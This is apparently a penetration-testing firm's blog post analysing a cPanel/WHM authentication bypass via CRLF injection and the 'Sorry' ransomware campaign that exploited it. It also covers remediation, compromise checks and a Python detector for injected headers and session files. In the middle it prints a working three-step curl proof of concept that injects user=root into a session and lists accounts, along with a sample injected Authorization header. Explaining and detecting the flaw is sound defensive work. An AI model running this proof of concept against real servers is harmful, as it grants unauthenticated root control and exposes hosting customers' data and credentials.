cPanel Auth Bypass | How CVE-2026-41940 Compromised 44,000 Servers in 24 Hours
CVE-2026-41940 allows authentication bypass in cPanel via CRLF injection: no credentials required, root access guaranteed. Technical analysis, Sorry ransomware campaign and urgent patch.
Within 72 hours of the proof-of-concept going public, 44,000 IP addresses running cPanel showed signs of compromise according to the Shadowserver Foundation. A CRLF injection bug in session management allows any unauthenticated attacker to inject user=root into a session file and gain full administrative access. CISA added it to the KEV catalog on April 30, 2026. CVSS 9.8.
If you manage a cPanel server, you are already days past the point where patching would have been early. Here is what happened and how the attack works.
Background
cPanel & WHM (WebHost Manager) is the most widely deployed Linux hosting control panel in the world, with conservative estimates placing exposed instances at 1.5 million. Anyone who runs a VPS or dedicated server, or manages dozens of domains for clients, knows it well. It is the panel that major hosting providers worldwide use every single day.
On April 28, 2026, WebPros (the company behind cPanel) released an emergency patch for CVE-2026-41940. Two days later, CISA added it to the catalog of actively exploited vulnerabilities. By May 2, BleepingComputer was reporting hundreds of sites encrypted by the "Sorry" ransomware campaign propagated through this exact vulnerability.
The exploit had been circulating since February 2026. The public disclosure simply accelerated what was already happening in the shadows.
Technical Analysis
Root cause: CRLF injection in the session handler
The vulnerability lives in how cPanel handles WHM session cookies. When a browser (or any client) sends an authenticated request, the whostmgrsession cookie is read, decrypted and used to load the corresponding session file.
The problem is that the cookie value is not sanitised before being used as a key when properties are written into the session file. An attacker can inject carriage-return and line-feed characters (\r\n, CRLF) through a crafted Authorization header.
The attack in three steps:
Step 1 | Bypass cookie encryption
The whostmgrsession cookie is normally encrypted. Vulnerable versions expose an alternative path in the authentication flow that allows triggering a controlled error during the decryption phase, causing the system to load a session file partially controlled by the attacker.
Step 2 | Inject session properties
Once the session manager tries to read properties from the file, the attacker sends an HTTP header like:
```http
Authorization: Basic dXNlcjpwYXNz\r\nuser=root\r\n
```
The \r\n characters are not filtered and end up literally in the session file written to disk. The session parser interprets user=root as a legitimate property.
Step 3 | Root access granted
On the next request, cPanel reads the manipulated session file, finds user=root and grants full privileges without any credential verification. The attacker is now root on the host system, with access to all configurations, databases and websites managed by the panel.
Affected versions and available patches
The vulnerability affects all versions of cPanel & WHM after 11.40. WebPros released patches for all active branches:
| Branch | Vulnerable | Fixed |
|---|---|---|
| 11.134.x | all | 11.134.x.y (backport) |
| 11.132.x | all | 11.132.x.y (backport) |
| 11.130.x | all | 11.130.x.y (backport) |
| 11.126.x | all | 11.126.x.y (backport) |
| 11.118.x | all | 11.118.x.y (backport) |
| 11.110.x | all | 11.110.x.y (backport) |
| 11.86.x | all | 11.86.x.y (backport) |
| 11.136.x | before 11.136.0.5 | 11.136.0.5 (stable branch) |
WP Squared (WordPress Squared, the product bundled with cPanel) is affected in versions prior to 136.1.7.
Proof of Concept
The PoC went public on GitHub within hours of disclosure. The attack requires just a couple of HTTP requests:
```bash
# Step 1: obtain an initial session token (even an invalid one works)
curl -sk https://target.example.com:2087/login/ \
-c /tmp/cpanel_cookies.txt -o /dev/null
# Step 2: inject user=root into the session file via CRLF
SESSION_ID=$(grep whostmgrsession /tmp/cpanel_cookies.txt | awk '{print $7}')
curl -sk https://target.example.com:2087/login/ \
-H "Authorization: Basic $(echo -n "${SESSION_ID}\r\nuser=root\r\n" | base64)" \
-b "whostmgrsession=${SESSION_ID}" \
-o /dev/null
# Step 3: access as root using the manipulated session
curl -sk https://target.example.com:2087/json-api/listaccts \
-b "whostmgrsession=${SESSION_ID}" | python3 -m json.tool
```
On a vulnerable server, listaccts returns the full list of hosting accounts including credentials, paths and configurations.
Real-World Impact
Figures as of May 2, 2026:
- 1.5 million cPanel instances exposed on the internet (WatchTowr/Shodan estimate)
- 44,000 IPs with signs of compromise or active reconnaissance (Shadowserver Foundation)
- Hundreds of websites encrypted and indexed by Google with ransom notes visible in search results
The impact does not stop at the server level: an attacker with WHM access controls everything running on top of it, including MySQL databases, email accounts, SSL certificates, PHP configurations and the API keys of installed CMS platforms. A single compromised cPanel server can expose dozens or hundreds of client websites.
Providers including Namecheap, Hosting.com and InMotion imposed temporary access restrictions on their panels to contain the spread, causing disruptions for legitimate customers.
The "Sorry" Ransomware Campaign
Running in parallel with the disclosure, a ransomware campaign emerged using CVE-2026-41940 as the initial access vector. The malware, named "Sorry" by BleepingComputer after the extension appended to encrypted files, has the following technical profile:
| Component | Detail |
|---|---|
| Language | Go (compiled for Linux x64) |
| File encryption | ChaCha20 stream cipher |
| Key protection | RSA-2048 (public key embedded in binary) |
| Extension added | .sorry |
| Ransom note | README.md dropped in every encrypted directory |
Decryption without the RSA-2048 private key is computationally infeasible with current hardware. Victims have no technical options beyond restoring from a clean, uncompromised backup.
The attacker contact channel uses Tox (encrypted P2P protocol), making the infrastructure difficult to trace and take down.
Remediation
Immediate action (now, not tomorrow):
```bash
# On any cPanel/WHM Linux server, update via upcp
/usr/local/cpanel/scripts/upcp --force
# Verify the installed version after update
cat /usr/local/cpanel/version
# Must show >= 11.136.0.5 or the corresponding patched branch
```
Compromise check (released by WatchTowr):
```bash
# Check WHM logs for requests with CRLF injection
grep -r "\\\r\\\n" /usr/local/cpanel/logs/access_log* 2>/dev/null
grep -r "user=root" /var/cpanel/sessions/ 2>/dev/null
# Look for anomalous session files with injected properties
find /var/cpanel/sessions/ -newer /tmp/reference_time -type f -exec grep -l "user=root" {} \;
```
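A plain grep for `user=root` also matches every legitimate root login, so here is an added example (not code from this post, WatchTowr or WebPros) that decodes logged Basic Authorization values and checks for embedded CR/LF or a smuggled `user=` property, and parses a session file as key=value lines to flag duplicate or control-character-laden properties. The session-file format and the presence of Authorization values in the logs are assumptions; the sample inputs are constructed.

```python
import base64
import binascii
import re

# Assumed session-file shape: newline-separated key=value properties (the post does not document it).
CONTROL = re.compile(r"[\r\n\x00]")
BASIC_RE = re.compile(r"Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", re.I)


def suspicious_auth_header(log_line: str) -> list:
    """Reasons a logged Basic Authorization value looks like a CRLF injection attempt."""
    reasons = []
    m = BASIC_RE.search(log_line)
    if not m:
        return reasons
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return ["Basic value is not valid base64"]
    if CONTROL.search(decoded):
        reasons.append("decoded credentials contain CR/LF/NUL")
    if re.search(r"(^|[\r\n])\s*user=", decoded):
        reasons.append("decoded credentials smuggle a 'user=' property")
    return reasons


def suspicious_session(content: str) -> list:
    """Reasons a session file's properties look appended by injection rather than written by login."""
    reasons, seen = [], {}
    for n, raw in enumerate(content.split("\n"), 1):
        line = raw.rstrip("\r")
        if not line:
            continue
        key, sep, value = line.partition("=")
        if not sep or not key.strip():
            reasons.append(f"line {n}: not a key=value property")
            continue
        if CONTROL.search(value):
            reasons.append(f"line {n}: control characters inside value of {key!r}")
        if key in seen:  # login writes each property once; a second 'user' is the injected one
            reasons.append(f"line {n}: duplicate property {key!r} ({seen[key]!r} -> {value!r})")
        seen[key] = value
    return reasons


# Constructed samples: one benign login, one CRLF attempt of the shape the post describes
BENIGN_LOG = "Authorization: Basic " + base64.b64encode(b"admin:s3cret").decode()
INJECT_LOG = "Authorization: Basic " + base64.b64encode(b"user:pass\r\nuser=root\r\n").decode()
BENIGN_SESSION = "user=admin\nexpires=1777000000\n"
INJECT_SESSION = "user=admin\nexpires=1777000000\r\nuser=root\r\n"
```

Run `suspicious_session` over each file under the sessions directory and `suspicious_auth_header` over each access-log line; a non-empty result is a file or request worth pulling into the incident timeline.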
Post-patch hardening:
- Restrict WHM access (port 2087) to specific administrative IPs via firewall (CSF or iptables)
- Enable two-factor authentication on all cPanel and WHM accounts
- Review access logs from the past 90 days for signs of retroactive compromise
- Rotate all API keys, database passwords and SMTP credentials configured in the panel
If your server answers on port 2087 without IP restrictions, assume that anyone on the internet could have attempted, and can still attempt, the exploit.
Notes from the SPECTROSEC Field
During an assessment of an Italian hosting provider in March 2026, we found three cPanel instances running version 11.118 with no IP restrictions on port 2087. At the time CVE-2026-41940 was not yet public, but the risk profile was already obvious: WHM accessible from any IP, no 2FA, unmonitored access logs.
The pattern we see repeatedly is this: the hosting panel is treated as "support infrastructure" rather than as a primary attack surface. Security testing gets done on the web application, never on the panel that manages it. The result is a server that might have Nginx configured correctly, an active WAF and strict CSP headers, yet is completely exposed because WHM, running a three-year-old version, answers to anyone on port 2087.
CVE-2026-41940 demonstrates that a single bug in the management panel nullifies every security control implemented above it.
SPECTROSEC Team | professional penetration testing, write us at info@spectrosec.com https://spectrosec.com